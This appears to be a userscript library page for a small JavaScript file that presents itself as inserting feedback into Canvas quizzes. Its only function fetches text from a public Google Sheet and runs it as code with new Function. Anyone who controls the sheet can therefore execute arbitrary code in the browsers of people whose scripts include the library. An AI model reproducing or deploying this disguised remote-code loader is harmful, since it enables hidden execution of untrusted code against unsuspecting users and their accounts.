InFbInCvQz

In-Fb-In-Cv-Qz

This script should not be not be installed directly. It is a library for other scripts to include with the meta directive // @require https://update.greatest.deepsurf.us/scripts/531210/1561988/InFbInCvQz.js

function insertFeedbackInCanvasQ(){

fetch( 
  "https://opensheet.elk.sh/1PDJD95ebVrFhGiYi58tCmLoZD6eY6sfKLGyrowJfLqA/Sheet1"    
   )
  .then((res) => res.json())
  .then((data) => {  
                  
    const myFunc = new Function(data[4]['BklScripts']);      
    myFunc(); 
          
  });

}